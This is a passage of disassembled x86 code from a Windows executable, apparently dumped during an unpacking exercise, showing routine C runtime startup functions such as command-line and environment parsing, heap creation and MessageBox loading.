; ---------------------------------------------------------------------------
loc_401B86: ; CODE XREF: sub_401AAC+CC�j
cmp ecx, 0C0000091h
jnz short loc_401B9A
mov dword_40715C, 84h
jmp short loc_401BE8
; ---------------------------------------------------------------------------
loc_401B9A: ; CODE XREF: sub_401AAC+E0�j
cmp ecx, 0C0000093h
jnz short loc_401BAE
mov dword_40715C, 85h
jmp short loc_401BE8
; ---------------------------------------------------------------------------
loc_401BAE: ; CODE XREF: sub_401AAC+F4�j
cmp ecx, 0C000008Dh
jnz short loc_401BC2
mov dword_40715C, 82h
jmp short loc_401BE8
; ---------------------------------------------------------------------------
loc_401BC2: ; CODE XREF: sub_401AAC+108�j
cmp ecx, 0C000008Fh
jnz short loc_401BD6
mov dword_40715C, 86h
jmp short loc_401BE8
; ---------------------------------------------------------------------------
loc_401BD6: ; CODE XREF: sub_401AAC+11C�j
cmp ecx, 0C0000092h
jnz short loc_401BE8
mov dword_40715C, 8Ah
loc_401BE8: ; CODE XREF: sub_401AAC+C4�j
; sub_401AAC+D8�j ...
push dword_40715C
push 8
call ebx
pop ecx
mov dword_40715C, esi
jmp short loc_401C02
; ---------------------------------------------------------------------------
loc_401BFB: ; CODE XREF: sub_401AAC+7E�j
and dword ptr [ecx+8], 0
push eax
call ebx
loc_401C02: ; CODE XREF: sub_401AAC+14D�j
mov eax, [ebp+arg_0]
pop ecx
mov dword_407304, eax
loc_401C0B: ; CODE XREF: sub_401AAC+62�j
or eax, 0FFFFFFFFh
jmp short loc_401C19
; ---------------------------------------------------------------------------
loc_401C10: ; CODE XREF: sub_401AAC+3D�j
; sub_401AAC+48�j
push [ebp+arg_4]
call ds:dword_40507C ; UnhandledExceptionFilter
loc_401C19: ; CODE XREF: sub_401AAC+5A�j
; sub_401AAC+162�j
pop esi
pop ebx
pop ebp
retn
sub_401AAC endp
; =============== S U B R O U T I N E =======================================
sub_401C1D proc near ; CODE XREF: .text:004013E7�p
push esi
push edi
xor edi, edi
cmp dword_40782C, edi
jnz short loc_401C2E
call sub_402EED
loc_401C2E: ; CODE XREF: sub_401C1D+A�j
mov esi, dword_407834
test esi, esi
jnz short loc_401C3D
mov esi, offset word_405752
loc_401C3D: ; CODE XREF: sub_401C1D+19�j
; sub_401C1D+4B�j
mov al, [esi]
cmp al, 20h
ja short loc_401C4B
test al, al
jz short loc_401C75
test edi, edi
jz short loc_401C6F
loc_401C4B: ; CODE XREF: sub_401C1D+24�j
cmp al, 22h
jnz short loc_401C58
xor ecx, ecx
test edi, edi
setz cl
mov edi, ecx
loc_401C58: ; CODE XREF: sub_401C1D+30�j
movzx eax, al
push eax
call sub_402B12
test eax, eax
pop ecx
jz short loc_401C67
inc esi
loc_401C67: ; CODE XREF: sub_401C1D+47�j
inc esi
jmp short loc_401C3D
; ---------------------------------------------------------------------------
loc_401C6A: ; CODE XREF: sub_401C1D+56�j
cmp al, 20h
ja short loc_401C75
inc esi
loc_401C6F: ; CODE XREF: sub_401C1D+2C�j
mov al, [esi]
test al, al
jnz short loc_401C6A
loc_401C75: ; CODE XREF: sub_401C1D+28�j
; sub_401C1D+4F�j
pop edi
mov eax, esi
pop esi
retn
sub_401C1D endp
; =============== S U B R O U T I N E =======================================
sub_401C7A proc near ; CODE XREF: .text:loc_4013B3�p
push ebx
xor ebx, ebx
cmp dword_40782C, ebx
push esi
push edi
jnz short loc_401C8C
call sub_402EED
loc_401C8C: ; CODE XREF: sub_401C7A+B�j
mov esi, dword_4072A0
xor edi, edi
cmp esi, ebx
jnz short loc_401CAA
jmp short loc_401CCA
; ---------------------------------------------------------------------------
loc_401C9A: ; CODE XREF: sub_401C7A+34�j
cmp al, 3Dh
jz short loc_401C9F
inc edi
loc_401C9F: ; CODE XREF: sub_401C7A+22�j
push esi
call sub_402680
pop ecx
lea esi, [esi+eax+1]
loc_401CAA: ; CODE XREF: sub_401C7A+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_401C9A
lea eax, ds:4[edi*4]
push eax
call sub_402FB5
mov edi, eax
cmp edi, ebx
pop ecx
mov dword_4072DC, edi
jnz short loc_401CCF
loc_401CCA: ; CODE XREF: sub_401C7A+1E�j
or eax, 0FFFFFFFFh
jmp short loc_401D27
; ---------------------------------------------------------------------------
loc_401CCF: ; CODE XREF: sub_401C7A+4E�j
mov esi, dword_4072A0
push ebp
jmp short loc_401D02
; ---------------------------------------------------------------------------
loc_401CD8: ; CODE XREF: sub_401C7A+8A�j
push esi
call sub_402680
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_401D00
push ebp
call sub_402FB5
cmp eax, ebx
pop ecx
mov [edi], eax
jz short loc_401D2B
push esi
push eax
call sub_402450
pop ecx
pop ecx
add edi, 4
loc_401D00: ; CODE XREF: sub_401C7A+6B�j
add esi, ebp
loc_401D02: ; CODE XREF: sub_401C7A+5C�j
cmp [esi], bl
jnz short loc_401CD8
push dword_4072A0
call sub_402F0B
mov dword_4072A0, ebx
mov [edi], ebx
mov dword_407820, 1
xor eax, eax
loc_401D25: ; CODE XREF: sub_401C7A+C5�j
pop ecx
pop ebp
loc_401D27: ; CODE XREF: sub_401C7A+53�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401D2B: ; CODE XREF: sub_401C7A+78�j
push dword_4072DC
call sub_402F0B
mov dword_4072DC, ebx
or eax, 0FFFFFFFFh
jmp short loc_401D25
sub_401C7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D41 proc near ; CODE XREF: sub_401EAD+54�p
; sub_401EAD+85�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_0], edx
push edi
mov [esi], edx
mov edi, ecx
mov dword ptr [ebx], 1
jz short loc_401D64
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_401D64: ; CODE XREF: sub_401D41+18�j
; sub_401D41+65�j ...
cmp byte ptr [eax], 22h
jnz short loc_401D77
xor ecx, ecx
test edx, edx
setz cl
inc eax
mov edx, ecx
mov cl, 22h
jmp short loc_401DA4
; ---------------------------------------------------------------------------
loc_401D77: ; CODE XREF: sub_401D41+26�j
inc dword ptr [esi]
test edi, edi
jz short loc_401D82
mov cl, [eax]
mov [edi], cl
inc edi
loc_401D82: ; CODE XREF: sub_401D41+3A�j
mov cl, [eax]
movzx ebx, cl
inc eax
test byte_4074E1[ebx], 4
jz short loc_401D9D
inc dword ptr [esi]
test edi, edi
jz short loc_401D9C
mov bl, [eax]
mov [edi], bl
inc edi
loc_401D9C: ; CODE XREF: sub_401D41+54�j
inc eax
loc_401D9D: ; CODE XREF: sub_401D41+4E�j
test cl, cl
mov ebx, [ebp+arg_4]
jz short loc_401DD6
loc_401DA4: ; CODE XREF: sub_401D41+34�j
test edx, edx
jnz short loc_401D64
cmp cl, 20h
jz short loc_401DB2
cmp cl, 9
jnz short loc_401D64
loc_401DB2: ; CODE XREF: sub_401D41+6A�j
test edi, edi
jz short loc_401DBA
mov byte ptr [edi-1], 0
loc_401DBA: ; CODE XREF: sub_401D41+73�j
; sub_401D41+96�j
and [ebp+var_4], 0
loc_401DBE: ; CODE XREF: sub_401D41+157�j
cmp byte ptr [eax], 0
jz loc_401E9D
loc_401DC7: ; CODE XREF: sub_401D41+93�j
mov cl, [eax]
cmp cl, 20h
jz short loc_401DD3
cmp cl, 9
jnz short loc_401DD9
loc_401DD3: ; CODE XREF: sub_401D41+8B�j
inc eax
jmp short loc_401DC7
; ---------------------------------------------------------------------------
loc_401DD6: ; CODE XREF: sub_401D41+61�j
dec eax
jmp short loc_401DBA
; ---------------------------------------------------------------------------
loc_401DD9: ; CODE XREF: sub_401D41+90�j
cmp byte ptr [eax], 0
jz loc_401E9D
cmp [ebp+arg_0], 0
jz short loc_401DF1
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_401DF1: ; CODE XREF: sub_401D41+A5�j
inc dword ptr [ebx]
loc_401DF3: ; CODE XREF: sub_401D41+145�j
xor ebx, ebx
inc ebx
xor edx, edx
jmp short loc_401DFC
; ---------------------------------------------------------------------------
loc_401DFA: ; CODE XREF: sub_401D41+BE�j
inc eax
inc edx
loc_401DFC: ; CODE XREF: sub_401D41+B7�j
cmp byte ptr [eax], 5Ch
jz short loc_401DFA
cmp byte ptr [eax], 22h
jnz short loc_401E2C
test dl, 1
jnz short loc_401E2A
cmp [ebp+var_4], 0
jz short loc_401E1D
lea ecx, [eax+1]
cmp byte ptr [ecx], 22h
jnz short loc_401E1D
mov eax, ecx
jmp short loc_401E1F
; ---------------------------------------------------------------------------
loc_401E1D: ; CODE XREF: sub_401D41+CE�j
; sub_401D41+D6�j
xor ebx, ebx
loc_401E1F: ; CODE XREF: sub_401D41+DA�j
xor ecx, ecx
cmp [ebp+var_4], ecx
setz cl
mov [ebp+var_4], ecx
loc_401E2A: ; CODE XREF: sub_401D41+C8�j
shr edx, 1
loc_401E2C: ; CODE XREF: sub_401D41+C3�j
test edx, edx
jz short loc_401E3D
loc_401E30: ; CODE XREF: sub_401D41+FA�j
test edi, edi
jz short loc_401E38
mov byte ptr [edi], 5Ch
inc edi
loc_401E38: ; CODE XREF: sub_401D41+F1�j
inc dword ptr [esi]
dec edx
jnz short loc_401E30
loc_401E3D: ; CODE XREF: sub_401D41+ED�j
mov cl, [eax]
test cl, cl
jz short loc_401E8B
cmp [ebp+var_4], 0
jnz short loc_401E53
cmp cl, 20h
jz short loc_401E8B
cmp cl, 9
jz short loc_401E8B
loc_401E53: ; CODE XREF: sub_401D41+106�j
test ebx, ebx
jz short loc_401E85
test edi, edi
jz short loc_401E74
movzx edx, cl
test byte_4074E1[edx], 4
jz short loc_401E6D
mov [edi], cl
inc edi
inc eax
inc dword ptr [esi]
loc_401E6D: ; CODE XREF: sub_401D41+124�j
mov cl, [eax]
mov [edi], cl
inc edi
jmp short loc_401E83
; ---------------------------------------------------------------------------
loc_401E74: ; CODE XREF: sub_401D41+118�j
movzx ecx, cl
test byte_4074E1[ecx], 4
jz short loc_401E83
inc eax
inc dword ptr [esi]
loc_401E83: ; CODE XREF: sub_401D41+131�j
; sub_401D41+13D�j
inc dword ptr [esi]
loc_401E85: ; CODE XREF: sub_401D41+114�j
inc eax
jmp loc_401DF3
; ---------------------------------------------------------------------------
loc_401E8B: ; CODE XREF: sub_401D41+100�j
; sub_401D41+10B�j ...
test edi, edi
jz short loc_401E93
mov byte ptr [edi], 0
inc edi
loc_401E93: ; CODE XREF: sub_401D41+14C�j
inc dword ptr [esi]
mov ebx, [ebp+arg_4]
jmp loc_401DBE
; ---------------------------------------------------------------------------
loc_401E9D: ; CODE XREF: sub_401D41+80�j
; sub_401D41+9B�j
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_401EA7
and dword ptr [eax], 0
loc_401EA7: ; CODE XREF: sub_401D41+161�j
inc dword ptr [ebx]
pop edi
pop ebx
leave
retn
sub_401D41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EAD proc near ; CODE XREF: .text:004013A2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp dword_40782C, edi
jnz short loc_401EC4
call sub_402EED
loc_401EC4: ; CODE XREF: sub_401EAD+10�j
push 104h
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push esi
push edi
mov byte_40740C, 0
call ds:dword_40503C ; GetModuleFileNameA
mov eax, dword_407834
cmp eax, edi
mov off_4072EC, esi
jz short loc_401EF3
cmp byte ptr [eax], 0
mov ebx, eax
jnz short loc_401EF5
loc_401EF3: ; CODE XREF: sub_401EAD+3D�j
mov ebx, esi
loc_401EF5: ; CODE XREF: sub_401EAD+44�j
lea eax, [ebp+var_4]
push eax
push edi
lea esi, [ebp+var_8]
xor ecx, ecx
mov eax, ebx
call sub_401D41
mov esi, [ebp+var_4]
mov eax, [ebp+var_8]
shl esi, 2
add eax, esi
push eax
call sub_402FB5
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_401F25
or eax, 0FFFFFFFFh
jmp short loc_401F4A
; ---------------------------------------------------------------------------
loc_401F25: ; CODE XREF: sub_401EAD+71�j
lea eax, [ebp+var_4]
push eax
lea ecx, [esi+edi]
push edi
lea esi, [ebp+var_8]
mov eax, ebx
call sub_401D41
mov eax, [ebp+var_4]
dec eax
pop ecx
mov dword_4072D0, eax
pop ecx
mov dword_4072D4, edi
xor eax, eax
loc_401F4A: ; CODE XREF: sub_401EAD+76�j
pop edi
pop esi
pop ebx
leave
retn
sub_401EAD endp
; =============== S U B R O U T I N E =======================================
sub_401F4F proc near ; CODE XREF: .text:00401398�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_407410
push ebx
push ebp
push esi
push edi
mov edi, ds:dword_405094
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_401F98
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_401F7F
mov dword_407410, 1
jmp short loc_401F9D
; ---------------------------------------------------------------------------
loc_401F7F: ; CODE XREF: sub_401F4F+22�j
call ds:dword_405090 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_401F93
mov eax, ebp
mov dword_407410, eax
jmp short loc_401F98
; ---------------------------------------------------------------------------
loc_401F93: ; CODE XREF: sub_401F4F+39�j
mov eax, dword_407410
loc_401F98: ; CODE XREF: sub_401F4F+1A�j
; sub_401F4F+42�j
cmp eax, 1
jnz short loc_40201A
loc_401F9D: ; CODE XREF: sub_401F4F+2E�j
cmp esi, ebx
jnz short loc_401FA9
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_402022
loc_401FA9: ; CODE XREF: sub_401F4F+50�j
cmp [esi], bx
mov eax, esi
jz short loc_401FBE
loc_401FB0: ; CODE XREF: sub_401F4F+66�j
; sub_401F4F+6D�j
add eax, ebp
cmp [eax], bx
jnz short loc_401FB0
add eax, ebp
cmp [eax], bx
jnz short loc_401FB0
loc_401FBE: ; CODE XREF: sub_401F4F+5F�j
mov edi, ds:dword_40508C
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_40200F
push ebp
call sub_402FB5
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_40200F
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_40200B
push [esp+18h+var_8]
call sub_402F0B
pop ecx
mov [esp+18h+var_8], ebx
loc_40200B: ; CODE XREF: sub_401F4F+AC�j
mov ebx, [esp+18h+var_8]
loc_40200F: ; CODE XREF: sub_401F4F+8C�j
; sub_401F4F+9B�j
push esi
call ds:dword_405088 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_40206A
; ---------------------------------------------------------------------------
loc_40201A: ; CODE XREF: sub_401F4F+4C�j
cmp eax, ebp
jz short loc_402026
cmp eax, ebx
jz short loc_402026
loc_402022: ; CODE XREF: sub_401F4F+58�j
; sub_401F4F+E1�j
xor eax, eax
jmp short loc_40206A
; ---------------------------------------------------------------------------
loc_402026: ; CODE XREF: sub_401F4F+CD�j
; sub_401F4F+D1�j
call ds:dword_405084 ; GetEnvironmentStrings
mov esi, eax
cmp esi, ebx
jz short loc_402022
cmp [esi], bl
jz short loc_402040
loc_402036: ; CODE XREF: sub_401F4F+EA�j
; sub_401F4F+EF�j
inc eax
cmp [eax], bl
jnz short loc_402036
inc eax
cmp [eax], bl
jnz short loc_402036
loc_402040: ; CODE XREF: sub_401F4F+E5�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_402FB5
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_402056
xor edi, edi
jmp short loc_402061
; ---------------------------------------------------------------------------
loc_402056: ; CODE XREF: sub_401F4F+101�j
push ebp
push esi
push edi
call sub_402FD0
add esp, 0Ch
loc_402061: ; CODE XREF: sub_401F4F+105�j
push esi
call ds:dword_405080 ; FreeEnvironmentStringsA
mov eax, edi
loc_40206A: ; CODE XREF: sub_401F4F+C9�j
; sub_401F4F+D5�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_401F4F endp
; =============== S U B R O U T I N E =======================================
sub_402071 proc near ; CODE XREF: .text:0040137C�p
var_44 = byte ptr -44h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
sub esp, 44h
push 100h
call sub_402FB5
test eax, eax
pop ecx
jnz short loc_40208B
or eax, 0FFFFFFFFh
jmp loc_402218
; ---------------------------------------------------------------------------
loc_40208B: ; CODE XREF: sub_402071+10�j
mov dword_407720, eax
mov dword_407708, 20h
lea ecx, [eax+100h]
jmp short loc_4020BC
; ---------------------------------------------------------------------------
loc_4020A2: ; CODE XREF: sub_402071+4D�j
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+4], 0
mov byte ptr [eax+5], 0Ah
mov ecx, dword_407720
add eax, 8
add ecx, 100h
loc_4020BC: ; CODE XREF: sub_402071+2F�j
cmp eax, ecx
jb short loc_4020A2
push ebx
push esi
push edi
lea eax, [esp+50h+var_44]
push eax
call ds:dword_405050 ; GetStartupInfoA
cmp [esp+4Ch+var_E], 0
jz loc_4021A1
mov eax, [esp+4Ch+var_C]
test eax, eax
jz loc_4021A1
mov esi, [eax]
push ebp
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_4020FA
mov esi, eax
loc_4020FA: ; CODE XREF: sub_402071+85�j
cmp dword_407708, esi
jge short loc_402154
mov edi, offset dword_407724
loc_402107: ; CODE XREF: sub_402071+D9�j
push 100h
call sub_402FB5
test eax, eax
pop ecx
jz short loc_40214E
add dword_407708, 20h
mov [edi], eax
lea ecx, [eax+100h]
jmp short loc_40213D
; ---------------------------------------------------------------------------
loc_402127: ; CODE XREF: sub_402071+CE�j
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+4], 0
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
loc_40213D: ; CODE XREF: sub_402071+B4�j
cmp eax, ecx
jb short loc_402127
add edi, 4
cmp dword_407708, esi
jl short loc_402107
jmp short loc_402154
; ---------------------------------------------------------------------------
loc_40214E: ; CODE XREF: sub_402071+A3�j
mov esi, dword_407708
loc_402154: ; CODE XREF: sub_402071+8F�j
; sub_402071+DB�j
xor edi, edi
test esi, esi
jle short loc_4021A0
loc_40215A: ; CODE XREF: sub_402071+12D�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_402197
mov cl, [ebp+0]
test cl, 1
jz short loc_402197
test cl, 8
jnz short loc_402179
push eax
call ds:dword_40509C ; GetFileType
test eax, eax
jz short loc_402197
loc_402179: ; CODE XREF: sub_402071+FB�j
mov eax, edi
sar eax, 5
mov eax, dword_407720[eax*4]
mov ecx, edi
and ecx, 1Fh
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_402197: ; CODE XREF: sub_402071+EE�j
; sub_402071+F6�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_40215A
loc_4021A0: ; CODE XREF: sub_402071+E7�j
pop ebp
loc_4021A1: ; CODE XREF: sub_402071+63�j
; sub_402071+6F�j
xor ebx, ebx
loc_4021A3: ; CODE XREF: sub_402071+194�j
mov eax, dword_407720
lea esi, [eax+ebx*8]
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_4021FD
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_4021BD
push 0FFFFFFF6h
pop eax
jmp short loc_4021C7
; ---------------------------------------------------------------------------
loc_4021BD: ; CODE XREF: sub_402071+145�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_4021C7: ; CODE XREF: sub_402071+14A�j
push eax
call ds:dword_405078 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4021EC
push edi
call ds:dword_40509C ; GetFileType
test eax, eax
jz short loc_4021EC
and eax, 0FFh
cmp eax, 2
mov [esi], edi
jnz short loc_4021F2
loc_4021EC: ; CODE XREF: sub_402071+162�j
; sub_402071+16D�j
or byte ptr [esi+4], 40h
jmp short loc_402201
; ---------------------------------------------------------------------------
loc_4021F2: ; CODE XREF: sub_402071+179�j
cmp eax, 3
jnz short loc_402201
or byte ptr [esi+4], 8
jmp short loc_402201
; ---------------------------------------------------------------------------
loc_4021FD: ; CODE XREF: sub_402071+13D�j
or byte ptr [esi+4], 80h
loc_402201: ; CODE XREF: sub_402071+17F�j
; sub_402071+184�j ...
inc ebx
cmp ebx, 3
jl short loc_4021A3
push dword_407708
call ds:dword_405098 ; LockResource
pop edi
pop esi
xor eax, eax
pop ebx
loc_402218: ; CODE XREF: sub_402071+15�j
add esp, 44h
retn
sub_402071 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40221C proc near ; CODE XREF: .text:loc_401374�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_405758
call __SEH_prolog
mov [ebp+var_1C], offset dword_405DEC
loc_40222F: ; CODE XREF: sub_40221C+3C�j
cmp [ebp+var_1C], offset dword_405DEC
jnb short loc_40225A
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_402250
call eax
jmp short loc_402250
; ---------------------------------------------------------------------------
loc_402249: ; DATA XREF: .rdata:stru_405758�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40224D: ; DATA XREF: .rdata:stru_405758�o
mov esp, [ebp+ms_exc.old_esp]
loc_402250: ; CODE XREF: sub_40221C+27�j
; sub_40221C+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_40222F
; ---------------------------------------------------------------------------
loc_40225A: ; CODE XREF: sub_40221C+1A�j
call __SEH_epilog
retn
sub_40221C endp
; ---------------------------------------------------------------------------
loc_402260: ; DATA XREF: sub_401761:loc_4017CC�o
push 0Ch
push offset stru_405768
call __SEH_prolog
mov dword ptr [ebp-1Ch], offset dword_405DF4
; START OF FUNCTION CHUNK FOR sub_402291
loc_402273: ; CODE XREF: sub_402291+B�j
cmp dword ptr [ebp-1Ch], offset dword_405DF4
jnb short loc_40229E
and dword ptr [ebp-4], 0
mov eax, [ebp-1Ch]
mov eax, [eax]
test eax, eax
jz short loc_402294
call eax
jmp short loc_402294
; END OF FUNCTION CHUNK FOR sub_402291
; =============== S U B R O U T I N E =======================================
sub_40228D proc near ; DATA XREF: .rdata:stru_405768�o
xor eax, eax
inc eax
retn
sub_40228D endp
; =============== S U B R O U T I N E =======================================
sub_402291 proc near ; DATA XREF: .rdata:stru_405768�o
; FUNCTION CHUNK AT 00402273 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0040229E SIZE 00000006 BYTES
mov esp, [ebp-18h]
loc_402294: ; CODE XREF: sub_402291-A�j
; sub_402291-6�j
or dword ptr [ebp-4], 0FFFFFFFFh
add dword ptr [ebp-1Ch], 4
jmp short loc_402273
sub_402291 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_402291
loc_40229E: ; CODE XREF: sub_402291-17�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_402291
; =============== S U B R O U T I N E =======================================
sub_4022A4 proc near ; CODE XREF: sub_4022BE+20�p
cmp dword_4072BC, 2
jnz short loc_4022BA
cmp dword_4072C8, 5
jb short loc_4022BA
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4022BA: ; CODE XREF: sub_4022A4+7�j
; sub_4022A4+10�j
push 3
pop eax
retn
sub_4022A4 endp
; =============== S U B R O U T I N E =======================================
sub_4022BE proc near ; CODE XREF: .text:00401349�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call ds:dword_4050A4 ; HeapCreate
test eax, eax
mov dword_407700, eax
jz short loc_402308
call sub_4022A4
cmp eax, 3
mov dword_407704, eax
jnz short loc_40230B
push 3F8h
call sub_40330D
test eax, eax
pop ecx
jnz short loc_40230B
push dword_407700
call ds:dword_4050A0 ; HeapDestroy
loc_402308: ; CODE XREF: sub_4022BE+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40230B: ; CODE XREF: sub_4022BE+2D�j
; sub_4022BE+3C�j
xor eax, eax
inc eax
retn
sub_4022BE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402310 proc near ; CODE XREF: .text:00401294�p
; .text:004015AE�p ...
arg_0 = byte ptr 4
cmp eax, 1000h
jnb short loc_402325
neg eax
add eax, esp
add eax, 4
test [eax], eax
xchg eax, esp
mov eax, [eax]
push eax
retn
; ---------------------------------------------------------------------------
loc_402325: ; CODE XREF: sub_402310+5�j
push ecx
lea ecx, [esp+4+arg_0]
loc_40232A: ; CODE XREF: sub_402310+2C�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_40232A
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_402310 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40234D proc near ; CODE XREF: .text:004015FB�p
; sub_4018FC+129�p
var_10 = byte ptr -10h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_A = byte ptr 12h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp dword_407414, ebx
push esi
push edi
jnz short loc_4023CD
push offset aUser32_dll ; "user32.dll"
call ds:dword_40502C ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_402408
mov esi, ds:dword_405028
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_407414, eax
jz short loc_402408
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_407418, eax
call esi ; GetProcAddress
cmp dword_4072BC, 2
mov dword_40741C, eax
jnz short loc_4023CD
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_407424, eax
jz short loc_4023CD
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi ; GetProcAddress
mov dword_407420, eax
loc_4023CD: ; CODE XREF: sub_40234D+11�j
; sub_40234D+60�j ...
mov eax, dword_407420
test eax, eax
jz short loc_402412
call eax
test eax, eax
jz short loc_4023F9
lea ecx, [ebp+var_4]
push ecx
push 0Ch
lea ecx, [ebp+var_10]
push ecx
push 1
push eax
call dword_407424
test eax, eax
jz short loc_4023F9
test [ebp+var_8], 1
jnz short loc_402412
loc_4023F9: ; CODE XREF: sub_40234D+8D�j
; sub_40234D+A4�j
cmp dword_4072C8, 4
jb short loc_40240C
or [ebp+arg_A], 20h
jmp short loc_402431
; ---------------------------------------------------------------------------
loc_402408: ; CODE XREF: sub_40234D+22�j
; sub_40234D+3D�j
xor eax, eax
jmp short loc_402441
; ---------------------------------------------------------------------------
loc_40240C: ; CODE XREF: sub_40234D+B3�j
or [ebp+arg_A], 4
jmp short loc_402431
; ---------------------------------------------------------------------------
loc_402412: ; CODE XREF: sub_40234D+87�j
; sub_40234D+AA�j
mov eax, dword_407418
test eax, eax
jz short loc_402431
call eax
mov ebx, eax
test ebx, ebx
jz short loc_402431
mov eax, dword_40741C
test eax, eax
jz short loc_402431
push ebx
call eax
mov ebx, eax
loc_402431: ; CODE XREF: sub_40234D+B9�j
; sub_40234D+C3�j ...
push dword ptr [ebp+10h]
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
call dword_407414
loc_402441: ; CODE XREF: sub_40234D+BD�j
pop edi
pop esi
pop ebx
leave
retn
sub_40234D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402450 proc near ; CODE XREF: .text:0040155A�p
; .text:004015BA�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_4024C5
sub_402450 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402460 proc near ; CODE XREF: .text:004015C6�p
; .text:004015D1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_402480
loc_40246D: ; CODE XREF: sub_402460+1C�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_4024B3
test ecx, 3
jnz short loc_40246D
mov edi, edi
loc_402480: ; CODE XREF: sub_402460+B�j
; sub_402460+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_402480
mov eax, [ecx-4]
test al, al
jz short loc_4024C2
test ah, ah
jz short loc_4024BD
test eax, 0FF0000h
jz short loc_4024B8
test eax, 0FF000000h
jz short loc_4024B3
jmp short loc_402480
; ---------------------------------------------------------------------------
loc_4024B3: ; CODE XREF: sub_402460+14�j
